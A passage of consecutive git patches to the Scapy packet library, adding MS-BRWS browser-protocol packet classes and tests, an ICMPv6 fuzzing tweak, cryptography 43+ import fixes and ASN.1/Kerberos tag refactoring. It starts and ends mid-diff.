ssl_client_socket.send(bytes(RESPS[1])) + # close socket + server.close() + + server = threading.Thread(target=ssl_server) + server.start() + assert lock.acquire(timeout=5), "Server failed to start in time !" + return server + + +def test_tls_client_native(post_handshake_auth=False, + with_hello_retry=False): + server = run_tls_native_test_server( + post_handshake_auth=post_handshake_auth, + with_hello_retry=with_hello_retry, + ) + + a = TLSClientAutomaton.tlslink( + HTTP, + server="127.0.0.1", + dport=59000, + version="tls13", + mycert=certfile, + mykey=keyfile, + # we select x25519 but the server enforces seco256r1, so a Hello Retry will be issued + curve="x25519" if with_hello_retry else None, + # debug=4, + ) + # First request + pkt = a.sr1(REQS[0], timeout=1, verbose=0) + assert pkt.load == b"Please login" + # Second request + a.send(REQS[1]) + pkt = a.sr1(REQS[1], timeout=1, verbose=0) + assert pkt.load == b"Welcome" + # Wait + server.join(3) + assert not server.is_alive() + + += Testing TLS client against ssl.SSLContext server with TLS 1.3 and a post-handshake authentication + +test_tls_client_native(post_handshake_auth=True) + += Testing TLS client against ssl.SSLContext server with TLS 1.3 and a Hello-Retry request + +test_tls_client_native(with_hello_retry=True) + # Automaton as Socket tests + TLSAutomatonClient socket tests From d8d24da22540c353a0f25eb2ab0e602de8f78423 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 26 Feb 2024 22:02:55 +0100 Subject: [PATCH 1226/1632] Basic [MS-BRWS] support (#4300) --- scapy/layers/ldap.py | 2 +- scapy/layers/netbios.py | 13 +++++- scapy/layers/smb.py | 87 ++++++++++++++++++++++++++++++++++++++- test/scapy/layers/smb.uts | 55 +++++++++++++++++++++++++ 4 files changed, 154 insertions(+), 3 deletions(-) diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index e9cfd4505a0..eaea379ec34 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -573,7 +573,7 @@ def is_request(self, req): req = req.protocolOp return ( req.attributes - and req.attributes[0].type.val == b"Netlogon" + and req.attributes[0].type.val.lower() == b"netlogon" and req.filter and isinstance(req.filter.filter, LDAP_FilterAnd) and any( diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 2728df819ee..fa02dec8f40 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -279,7 +279,11 @@ class NBNSRegistrationRequest(Packet): IPField("NB_ADDRESS", "127.0.0.1") ] + def mysummary(self): + return self.sprintf("Register %G% %QUESTION_NAME% at %NB_ADDRESS%") + +bind_bottom_up(NBNSHeader, NBNSRegistrationRequest, OPCODE=0x5) bind_layers(NBNSHeader, NBNSRegistrationRequest, OPCODE=0x5, NM_FLAGS=0x11, QDCOUNT=1, ARCOUNT=1) @@ -312,7 +316,7 @@ class NBTDatagram(Packet): ShortField("ID", 0), IPField("SourceIP", "127.0.0.1"), ShortField("SourcePort", 138), - ShortField("Length", 272), + ShortField("Length", None), ShortField("Offset", 0), NetBIOSNameField("SourceName", "windows"), ShortEnumField("SUFFIX1", 0x4141, _NETBIOS_SUFFIXES), @@ -321,6 +325,13 @@ class NBTDatagram(Packet): ShortEnumField("SUFFIX2", 0x4141, _NETBIOS_SUFFIXES), ByteField("NULL2", 0)] + def post_build(self, pkt, pay): + if self.Length is None: + length = len(pay) + 68 + pkt = pkt[:10] + struct.pack("!H", length) + pkt[12:] + return pkt + pay + + # SESSION SERVICE PACKETS diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index f50ab0e6fd6..bafb790bd31 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -684,8 +684,10 @@ class SMBSession_Null(Packet): class _SMB_TransactionRequest_Data(PacketLenField): def m2i(self, pkt, m): - if pkt.WordCount == 0x11: + if pkt.Name == b"\\MAILSLOT\\NET\\NETLOGON": return NETLOGON(m) + elif pkt.Name == b"\\MAILSLOT\\BROWSE" or pkt.name == b"\\MAILSLOT\\LANMAN": + return BRWS(m) return conf.raw_layer(m) @@ -780,6 +782,11 @@ def post_build(self, pkt, pay): + pay ) + def mysummary(self): + if self.DataLen: + return self.sprintf("Tran %Name% ") + self.Data.mysummary() + return self.sprintf("Tran %Name%") + bind_top_down(SMB_Header, SMBTransaction_Request, Command=0x25) @@ -1084,6 +1091,84 @@ def get_full(self): return self.original +# [MS-BRWS] sect 2.2 + +class BRWS(Packet): + fields_desc = [ + ByteEnumField("OpCode", 0x00, { + 0x01: "HostAnnouncement", + 0x02: "AnnouncementRequest", + 0x08: "RequestElection", + 0x09: "GetBackupListRequest", + 0x0A: "GetBackupListResponse", + 0x0B: "BecomeBackup", + 0x0C: "DomainAnnouncement", + 0x0D: "MasterAnnouncement", + 0x0E: "ResetStateRequest", + 0x0F: "LocalMasterAnnouncement", + }), + ] + + def mysummary(self): + return self.sprintf("%OpCode%") + + registered_opcodes = {} + + @classmethod + def register_variant(cls): + cls.registered_opcodes[cls.OpCode.default] = cls + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt: + return cls.registered_opcodes.get(_pkt[0], cls) + return cls + + def default_payload_class(self, payload): + return conf.padding_layer + + +# [MS-BRWS] sect 2.2.1 + +class BRWS_HostAnnouncement(BRWS): + OpCode = 0x01 + fields_desc = [ + BRWS, + ByteField("UpdateCount", 0), + LEIntField("Periodicity", 128000), + StrFixedLenField("ServerName", b"", length=16), + ByteField("OSVersionMajor", 6), + ByteField("OSVersionMinor", 1), + LEIntField("ServerType", 4611), + ByteField("BrowserConfigVersionMajor", 21), + ByteField("BrowserConfigVersionMinor", 1), + XLEShortField("Signature", 0xAA55), + StrNullField("Comment", ""), + ] + + def mysummary(self): + return self.sprintf("%OpCode% for %ServerName%") + + +# [MS-BRWS] sect 2.2.6 + +class BRWS_BecomeBackup(BRWS): + OpCode = 0x0B + fields_desc = [ + BRWS, + StrNullField("BrowserToPromote", b""), + ] + + def mysummary(self): + return self.sprintf("%OpCode% from %BrowserToPromote%") + + +# [MS-BRWS] sect 2.2.10 + +class BRWS_LocalMasterAnnouncement(BRWS_HostAnnouncement): + OpCode = 0x0F + + # SMB dispatcher diff --git a/test/scapy/layers/smb.uts b/test/scapy/layers/smb.uts index 879551032c2..81d0426883a 100644 --- a/test/scapy/layers/smb.uts +++ b/test/scapy/layers/smb.uts @@ -148,3 +148,58 @@ assert smb_sax_resp_2.SecurityBlob.token.negResult == 0 assert smb_sax_resp_2.SecurityBlob.token.mechListMIC.value.val == b'\x01\x00\x00\x00\xee\t\x91S\xab\x7f]\xe6\x00\x00\x00\x00' assert smb_sax_resp_2.NativeOS == 'Windows 8.1 9600' assert smb_sax_resp_2.NativeLanMan == 'Windows 8.1 6.3' + + ++ Test BRWS + += BRWS BecomeBackup - build + +pkt = \ + IP(id=3109, ttl=128, src='192.168.1.2', dst='192.168.1.255') / \ + UDP(sport=138, dport=138) / \ + NBTDatagram(Type=17, Flags=2, ID=37087, SourceIP='192.168.1.2', + SourcePort=138, SourceName=b'VIKRANT-LAPTOP ', + SUFFIX1=16705, DestinationName=b'WORKGROUP', + SUFFIX2=16975) / \ + SMB_Header(Flags=0) / \ + SMBMailslot_Write(Data=BRWS_BecomeBackup(OpCode=11, BrowserToPromote='LENOVO-NETBOOK'), + Timeout=1000, Name='\\MAILSLOT\\BROWSE') + + +assert bytes(pkt) == b'E\x00\x00\xd4\x0c%\x00\x00\x80\x11\xa9\xa2\xc0\xa8\x01\x02\xc0\xa8\x01\xff\x00\x8a\x00\x8a\x00\xc0\xca)\x11\x02\x90\xdf\xc0\xa8\x01\x02\x00\x8a\x00\xaa\x00\x00 FGEJELFCEBEOFECNEMEBFAFEEPFACAAA\x00 FHEPFCELEHFCEPFFFACACACACACACABO\x00\xffSMB%\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\x03\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00V\x00\x03\x00\x01\x00\x01\x00\x02\x00!\x00\\MAILSLOT\\BROWSE\x00\x0bLENOVO-NETBOOK\x00' + += BRWS BecomeBackup - dissection + +pkt = IP(b'E\x00\x00\xd4\x0c%\x00\x00\x80\x11\xa9\xa2\xc0\xa8\x01\x02\xc0\xa8\x01\xff\x00\x8a\x00\x8a\x00\xc0\xca)\x11\x02\x90\xdf\xc0\xa8\x01\x02\x00\x8a\x00\xaa\x00\x00 FGEJELFCEBEOFECNEMEBFAFEEPFACAAA\x00 FHEPFCELEHFCEPFFFACACACACACACABO\x00\xffSMB%\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\x03\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00V\x00\x03\x00\x01\x00\x01\x00\x02\x00!\x00\\MAILSLOT\\BROWSE\x00\x0bLENOVO-NETBOOK\x00') + +assert SMBMailslot_Write in pkt +assert pkt[SMBMailslot_Write].Timeout == 1000 +assert pkt[SMBMailslot_Write].Name == b"\\MAILSLOT\\BROWSE" +assert pkt[SMBMailslot_Write].Data.BrowserToPromote == b'LENOVO-NETBOOK' + += BRWS HostAnnouncement - build + +pkt = \ + IP(id=51657, tos=0x20, src='192.168.1.8', dst='192.168.1.255') / \ + UDP(sport=138, dport=138) / \ + NBTDatagram(Type=17, Flags=2, ID=18755, SourceIP='192.168.1.8', + SourcePort=0, SourceName='MACBOOKPRO-199C', + SUFFIX1=16705, DestinationName='WORKGROUP', + SUFFIX2=16974) / \ + SMB_Header(Flags=0, PIDLow=176, MID=18754) / \ + SMBMailslot_Write(Data=BRWS_HostAnnouncement(ServerName="MACBOOKPRO-122A", Comment="Super's MacBook Pro"), + Timeout=0, Flags=2, Name='\\MAILSLOT\\BROWSE') + + +assert bytes(pkt) == b"E \x00\xf8\xc9\xc9\x00\x00@\x11+\xb4\xc0\xa8\x01\x08\xc0\xa8\x01\xff\x00\x8a\x00\x8a\x00\xe4\xb3\xb0\x11\x02IC\xc0\xa8\x01\x08\x00\x00\x00\xce\x00\x00 ENEBEDECEPEPELFAFCEPCNDBDJDJEDAA\x00 FHEPFCELEHFCEPFFFACACACACACACABN\x00\xffSMB%\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x00\x00\x00BI\x11\x00\x004\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x004\x00V\x00\x03\x00\x01\x00\x01\x00\x02\x00E\x00\\MAILSLOT\\BROWSE\x00\x01\x00\x00\xf4\x01\x00MACBOOKPRO-122A\x00\x06\x01\x03\x12\x00\x00\x15\x01U\xaaSuper's MacBook Pro\x00" + += BRWS HostAnnouncement - dissection + +pkt = IP(b"E \x00\xf8\xc9\xc9\x00\x00@\x11+\xb4\xc0\xa8\x01\x08\xc0\xa8\x01\xff\x00\x8a\x00\x8a\x00\xe4\xb3\xb0\x11\x02IC\xc0\xa8\x01\x08\x00\x00\x00\xce\x00\x00 ENEBEDECEPEPELFAFCEPCNDBDJDJEDAA\x00 FHEPFCELEHFCEPFFFACACACACACACABN\x00\xffSMB%\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x00\x00\x00BI\x11\x00\x004\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x004\x00V\x00\x03\x00\x01\x00\x01\x00\x02\x00E\x00\\MAILSLOT\\BROWSE\x00\x01\x00\x00\xf4\x01\x00MACBOOKPRO-122A\x00\x06\x01\x03\x12\x00\x00\x15\x01U\xaaSuper's MacBook Pro\x00") + +assert SMBMailslot_Write in pkt +assert pkt[SMBMailslot_Write].Name == b"\\MAILSLOT\\BROWSE" +assert pkt[SMBMailslot_Write].Data.OpCode == 1 +assert pkt[SMBMailslot_Write].Data.ServerName == b"MACBOOKPRO-122A\x00" +assert pkt[SMBMailslot_Write].Data.Comment == b"Super's MacBook Pro" +assert pkt[SMBMailslot_Write].Data.Signature == 0xAA55 From 28c2f78511d310f4465fe55aefb1f9ca28e228c3 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Fri, 1 Mar 2024 11:09:40 +0300 Subject: [PATCH 1227/1632] [inet6] make ICMPv6NDOptUnknown a bit more fuzzable (#4305) Without this patch the type of Neighbor Discovery options generated by fuzz(ICMPv6NDOptUnknown()) is always 0. With this patch applied option types are random. It's a follow-up to https://github.com/secdev/scapy/pull/4233 --- scapy/layers/inet6.py | 2 +- test/scapy/layers/inet6.uts | 2 ++ 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index d520aa154a7..529ee3b2b44 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1789,7 +1789,7 @@ def m2i(self, pkt, x): class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" - fields_desc = [ByteField("type", None), + fields_desc = [ByteField("type", 0), FieldLenField("len", None, length_of="data", fmt="B", adjust=lambda pkt, x: (2 + x) // 8), ICMPv6NDOptDataField("data", "", strip_zeros=False, diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index ad9703eaf9a..d878b2d3613 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -837,6 +837,8 @@ assert raw(p) == b p = ICMPv6NDOptSrcLLAddr(b)[ICMPv6NDOptUnknown] assert p.type == 0 and p.len == 2 and p.data == b'somestring\x00\x00\x00\x00' += ICMPv6NDOptUnknown - fuzz +assert isinstance(fuzz(ICMPv6NDOptUnknown()).type, RandByte) ############ ############ From 77569af5176255b8c27c5d0d7a0ab363095b49f8 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 26 Feb 2024 22:29:23 +0100 Subject: [PATCH 1228/1632] Fix imports of cryptography for 43.0+ --- scapy/layers/ipsec.py | 32 ++++++++++++++++++++------------ scapy/libs/rfc3961.py | 9 ++++++++- 2 files changed, 28 insertions(+), 13 deletions(-) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index b89746b5f01..f8f52d9bf1c 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -208,6 +208,13 @@ def data_for_encryption(self): algorithms, modes, ) + try: + # cryptography > 43.0 + from cryptography.hazmat.decrepit.ciphers import ( + algorithms as decrepit_algorithms + ) + except ImportError: + decrepit_algorithms = algorithms else: log_loading.info("Can't import python-cryptography v1.7+. " "Disabled IPsec encryption/authentication.") @@ -565,34 +572,35 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): icv_size=16, format_mode_iv=_salt_format_mode_iv) # noqa: E501 - # XXX: RFC7321 states that DES *MUST NOT* be implemented. - # XXX: Keep for backward compatibility? # Using a TripleDES cipher algorithm for DES is done by using the same 64 # bits key 3 times (done by cryptography when given a 64 bits key) CRYPT_ALGOS['DES'] = CryptAlgo('DES', - cipher=algorithms.TripleDES, + cipher=decrepit_algorithms.TripleDES, mode=modes.CBC, key_size=(8,)) CRYPT_ALGOS['3DES'] = CryptAlgo('3DES', - cipher=algorithms.TripleDES, + cipher=decrepit_algorithms.TripleDES, mode=modes.CBC) - try: + if decrepit_algorithms is algorithms: + # cryptography < 43 raises a DeprecationWarning from cryptography.utils import CryptographyDeprecationWarning with warnings.catch_warnings(): # Hide deprecation warnings warnings.filterwarnings("ignore", category=CryptographyDeprecationWarning) CRYPT_ALGOS['CAST'] = CryptAlgo('CAST', - cipher=algorithms.CAST5, + cipher=decrepit_algorithms.CAST5, mode=modes.CBC) - # XXX: Flagged as weak by 'cryptography'. - # Kept for backward compatibility CRYPT_ALGOS['Blowfish'] = CryptAlgo('Blowfish', - cipher=algorithms.Blowfish, + cipher=decrepit_algorithms.Blowfish, mode=modes.CBC) - except AttributeError: - # Future-proof, if ever removed from cryptography - pass + else: + CRYPT_ALGOS['CAST'] = CryptAlgo('CAST', + cipher=decrepit_algorithms.CAST5, + mode=modes.CBC) + CRYPT_ALGOS['Blowfish'] = CryptAlgo('Blowfish', + cipher=decrepit_algorithms.Blowfish, + mode=modes.CBC) ############################################################################### diff --git a/scapy/libs/rfc3961.py b/scapy/libs/rfc3961.py index 443ae9e61ca..97b2b59d00c 100644 --- a/scapy/libs/rfc3961.py +++ b/scapy/libs/rfc3961.py @@ -77,12 +77,19 @@ from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes + try: + # cryptography > 43.0 + from cryptography.hazmat.decrepit.ciphers import ( + algorithms as decrepit_algorithms + ) + except ImportError: + decrepit_algorithms = algorithms except ImportError: raise ImportError("To use kerberos cryptography, you need to install cryptography.") # cryptography's TripleDES allow the usage of a 56bit key, which thus behaves like DES -DES = algorithms.TripleDES +DES = decrepit_algorithms.TripleDES # https://go.microsoft.com/fwlink/?LinkId=186039 From df6eabe9d5fec434c0e234cf938549850c5619b5 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 4 Mar 2024 09:59:39 +0100 Subject: [PATCH 1229/1632] ASN.1: minor cleanup + LDAP/KRB bug fixes (#4306) --- scapy/asn1/ber.py | 30 +++--- scapy/asn1fields.py | 18 ++-- scapy/layers/kerberos.py | 133 ++++++++++++++------------- scapy/layers/ldap.py | 152 ++++++++++++++++++------------- test/contrib/automotive/doip.uts | 2 + test/run_tests | 1 + test/scapy/layers/ldap.uts | 4 + 7 files changed, 190 insertions(+), 150 deletions(-) diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index cfea919585e..23899274e4a 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -15,6 +15,7 @@ from scapy.compat import chb, orb, bytes_encode from scapy.utils import binrepr, inet_aton, inet_ntoa from scapy.asn1.asn1 import ( + ASN1Tag, ASN1_BADTAG, ASN1_BadTag_Decoding_Error, ASN1_Class, @@ -216,7 +217,7 @@ def BER_id_enc(n): def BER_tagging_dec(s, # type: bytes - hidden_tag=None, # type: Optional[Any] + hidden_tag=None, # type: Optional[int | ASN1Tag] implicit_tag=None, # type: Optional[int] explicit_tag=None, # type: Optional[int] safe=False, # type: Optional[bool] @@ -224,6 +225,7 @@ def BER_tagging_dec(s, # type: bytes ): # type: (...) -> Tuple[Optional[int], bytes] # We output the 'real_tag' if it is different from the (im|ex)plicit_tag. + # 'hidden_tag' is the type tag that is implicited when 'implicit_tag' is used. real_tag = None if len(s) > 0: err_msg = ( @@ -233,13 +235,13 @@ def BER_tagging_dec(s, # type: bytes if implicit_tag is not None: ber_id, s = BER_id_dec(s) if ber_id != implicit_tag: - if not safe and ber_id & 0x1f != implicit_tag & 0x1f: + if not safe and ber_id != implicit_tag: raise BER_Decoding_Error(err_msg % ( ber_id, implicit_tag, _fname), remaining=s) else: real_tag = ber_id - s = chb(hash(hidden_tag)) + s + s = chb(int(hidden_tag)) + s # type: ignore elif explicit_tag is not None: ber_id, s = BER_id_dec(s) if ber_id != explicit_tag: @@ -253,11 +255,11 @@ def BER_tagging_dec(s, # type: bytes return real_tag, s -def BER_tagging_enc(s, hidden_tag=None, implicit_tag=None, explicit_tag=None): - # type: (bytes, Optional[Any], Optional[int], Optional[int]) -> bytes +def BER_tagging_enc(s, implicit_tag=None, explicit_tag=None): + # type: (bytes, Optional[int], Optional[int]) -> bytes if len(s) > 0: if implicit_tag is not None: - s = BER_id_enc((hash(hidden_tag) & ~(0x1f)) | implicit_tag) + s[1:] + s = BER_id_enc(implicit_tag) + s[1:] elif explicit_tag is not None: s = BER_id_enc(explicit_tag) + BER_len_enc(len(s)) + s return s @@ -424,9 +426,9 @@ def enc(cls, i, size_len=0): i >>= 8 if not i: break - s = [chb(hash(c)) for c in ls] + s = [chb(int(c)) for c in ls] s.append(BER_len_enc(len(s), size=size_len)) - s.append(chb(hash(cls.tag))) + s.append(chb(int(cls.tag))) s.reverse() return b"".join(s) @@ -495,7 +497,7 @@ def enc(cls, _s, size_len=0): s = b"".join(chb(int(b"".join(chb(y) for y in x), 2)) for x in zip(*[iter(s)] * 8)) s = chb(unused_bits) + s - return chb(hash(cls.tag)) + BER_len_enc(len(s), size=size_len) + s + return chb(int(cls.tag)) + BER_len_enc(len(s), size=size_len) + s class BERcodec_STRING(BERcodec_Object[str]): @@ -506,7 +508,7 @@ def enc(cls, _s, size_len=0): # type: (Union[str, bytes], Optional[int]) -> bytes s = bytes_encode(_s) # Be sure we are encoding bytes - return chb(hash(cls.tag)) + BER_len_enc(len(s), size=size_len) + s + return chb(int(cls.tag)) + BER_len_enc(len(s), size=size_len) + s @classmethod def do_dec(cls, @@ -526,7 +528,7 @@ class BERcodec_NULL(BERcodec_INTEGER): def enc(cls, i, size_len=0): # type: (int, Optional[int]) -> bytes if i == 0: - return chb(hash(cls.tag)) + b"\0" + return chb(int(cls.tag)) + b"\0" else: return super(cls, cls).enc(i, size_len=size_len) @@ -546,7 +548,7 @@ def enc(cls, _oid, size_len=0): lst[1] += 40 * lst[0] del lst[0] s = b"".join(BER_num_enc(k) for k in lst) - return chb(hash(cls.tag)) + BER_len_enc(len(s), size=size_len) + s + return chb(int(cls.tag)) + BER_len_enc(len(s), size=size_len) + s @classmethod def do_dec(cls, @@ -631,7 +633,7 @@ def enc(cls, _ll, size_len=0): ll = _ll else: ll = b"".join(x.enc(cls.codec) for x in _ll) - return chb(hash(cls.tag)) + BER_len_enc(len(ll), size=size_len) + ll + return chb(int(cls.tag)) + BER_len_enc(len(ll), size=size_len) + ll @classmethod def do_dec(cls, @@ -678,7 +680,7 @@ def enc(cls, ipaddr_ascii, size_len=0): # type: ignore s = inet_aton(ipaddr_ascii) except Exception: raise BER_Encoding_Error("IPv4 address could not be encoded") - return chb(hash(cls.tag)) + BER_len_enc(len(s), size=size_len) + s + return chb(int(cls.tag)) + BER_len_enc(len(s), size=size_len) + s @classmethod def do_dec(cls, s, context=None, safe=False): diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 84e454e459f..2f1da38b657 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -110,8 +110,8 @@ def __init__(self, if (implicit_tag is not None) and (explicit_tag is not None): err_msg = "field cannot be both implicitly and explicitly tagged" raise ASN1_Error(err_msg) - self.implicit_tag = implicit_tag - self.explicit_tag = explicit_tag + self.implicit_tag = implicit_tag and int(implicit_tag) + self.explicit_tag = explicit_tag and int(explicit_tag) # network_tag gets useful for ASN1F_CHOICE self.network_tag = int(implicit_tag or explicit_tag or self.ASN1_tag) self.owners = [] # type: List[Type[ASN1_Packet]] @@ -173,7 +173,7 @@ def i2m(self, pkt, x): raise ASN1_Error("Encoding Error: got %r instead of an %r for field [%s]" % (x, self.ASN1_tag, self.name)) # noqa: E501 else: s = self.ASN1_tag.get_codec(pkt.ASN1_codec).enc(x, size_len=self.size_len) - return BER_tagging_enc(s, hidden_tag=self.ASN1_tag, + return BER_tagging_enc(s, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag) @@ -709,8 +709,6 @@ def __init__(self, name, default, *args, **kwargs): else: # should be ASN1F_field instance self.choices[p.network_tag] = p - if p.implicit_tag is not None: - self.choices[p.implicit_tag & 0x1f] = p self.pktchoices[hash(p.cls)] = (p.implicit_tag, p.explicit_tag) # noqa: E501 else: raise ASN1_Error("ASN1F_CHOICE: no tag found for one field") @@ -729,9 +727,7 @@ def m2i(self, pkt, s): if tag in self.choices: choice = self.choices[tag] else: - if tag & 0x1f in self.choices: # Try resolve only the tag number - choice = self.choices[tag & 0x1f] - elif self.flexible_tag: + if self.flexible_tag: choice = ASN1F_field else: raise ASN1_Error( @@ -757,7 +753,7 @@ def i2m(self, pkt, x): s = raw(x) if hash(type(x)) in self.pktchoices: imp, exp = self.pktchoices[hash(type(x))] - s = BER_tagging_enc(s, hidden_tag=self.ASN1_tag, + s = BER_tagging_enc(s, implicit_tag=imp, explicit_tag=exp) return BER_tagging_enc(s, explicit_tag=self.explicit_tag) @@ -800,7 +796,7 @@ def __init__(self, ) if implicit_tag is None and explicit_tag is None and cls is not None: if cls.ASN1_root.ASN1_tag == ASN1_Class_UNIVERSAL.SEQUENCE: - self.network_tag = 16 | 0x20 + self.network_tag = 16 | 0x20 # 16 + CONSTRUCTED self.default = default def m2i(self, pkt, s): @@ -845,7 +841,7 @@ def i2m(self, if not hasattr(x, "ASN1_root"): # A normal Packet (!= ASN1) return s - return BER_tagging_enc(s, hidden_tag=self.ASN1_tag, + return BER_tagging_enc(s, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 8689437fafa..598346ddbc3 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -60,15 +60,13 @@ from scapy.asn1.asn1 import ( ASN1_BIT_STRING, ASN1_BOOLEAN, + ASN1_Class, ASN1_GENERAL_STRING, ASN1_GENERALIZED_TIME, ASN1_INTEGER, - ASN1_SEQUENCE, ASN1_STRING, - ASN1_Class_UNIVERSAL, ASN1_Codecs, ) -from scapy.asn1.ber import BERcodec_SEQUENCE from scapy.asn1fields import ( ASN1F_BOOLEAN, ASN1F_CHOICE, @@ -131,24 +129,30 @@ ) from scapy.layers.inet import TCP, UDP -# kerberos APPLICATION - - -class ASN1_Class_KRB(ASN1_Class_UNIVERSAL): - name = "KERBEROS" - APPLICATION = 0x60 - - -class ASN1_KRB_APPLICATION(ASN1_SEQUENCE): - tag = ASN1_Class_KRB.APPLICATION - - -class BERcodec_KRB_APPLICATION(BERcodec_SEQUENCE): - tag = ASN1_Class_KRB.APPLICATION +# kerberos APPLICATION -class ASN1F_KRB_APPLICATION(ASN1F_SEQUENCE): - ASN1_tag = ASN1_Class_KRB.APPLICATION +class ASN1_Class_KRB(ASN1_Class): + name = "Kerberos" + # APPLICATION + CONSTRUCTED = 0x40 | 0x20 + Token = 0x60 | 0 # GSSAPI + Ticket = 0x60 | 1 + Authenticator = 0x60 | 2 + EncTicketPart = 0x60 | 3 + AS_REQ = 0x60 | 10 + AS_REP = 0x60 | 11 + TGS_REQ = 0x60 | 12 + TGS_REP = 0x60 | 13 + AP_REQ = 0x60 | 14 + AP_REP = 0x60 | 15 + PRIV = 0x60 | 21 + CRED = 0x60 | 22 + EncASRepPart = 0x60 | 25 + EncTGSRepPart = 0x60 | 26 + EncAPRepPart = 0x60 | 27 + EncKrbPrivPart = 0x60 | 28 + EncKrbCredPart = 0x60 | 29 + ERROR = 0x60 | 30 # RFC4120 sect 5.2 @@ -1213,14 +1217,14 @@ class PA_S4U_X509_USER(ASN1_Packet): class KRB_Ticket(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( ASN1F_INTEGER("tktVno", 5, explicit_tag=0xA0), Realm("realm", "", explicit_tag=0xA1), ASN1F_PACKET("sname", PrincipalName(), PrincipalName, explicit_tag=0xA2), ASN1F_PACKET("encPart", EncryptedData(), EncryptedData, explicit_tag=0xA3), ), - implicit_tag=1, + implicit_tag=ASN1_Class_KRB.Ticket, ) def getSPN(self): @@ -1261,7 +1265,7 @@ class TransitedEncoding(ASN1_Packet): class EncTicketPart(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( KerberosFlags( "flags", @@ -1292,7 +1296,7 @@ class EncTicketPart(ASN1_Packet): ), ), ), - implicit_tag=3, + implicit_tag=ASN1_Class_KRB.EncTicketPart, ) @@ -1389,17 +1393,17 @@ class KrbFastReq(ASN1_Packet): class KRB_AS_REQ(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( KRB_KDC_REQ, - implicit_tag=10, + implicit_tag=ASN1_Class_KRB.AS_REQ, ) class KRB_TGS_REQ(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( KRB_KDC_REQ, - implicit_tag=12, + implicit_tag=ASN1_Class_KRB.TGS_REQ, ) msgType = ASN1_INTEGER(12) @@ -1421,17 +1425,17 @@ class KRB_TGS_REQ(ASN1_Packet): class KRB_AS_REP(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( KRB_KDC_REP, - implicit_tag=11, + implicit_tag=ASN1_Class_KRB.AS_REP, ) class KRB_TGS_REP(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( KRB_KDC_REP, - implicit_tag=13, + implicit_tag=ASN1_Class_KRB.TGS_REP, ) @@ -1478,17 +1482,17 @@ class LastReqItem(ASN1_Packet): class EncASRepPart(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( EncKDCRepPart, - implicit_tag=25, + 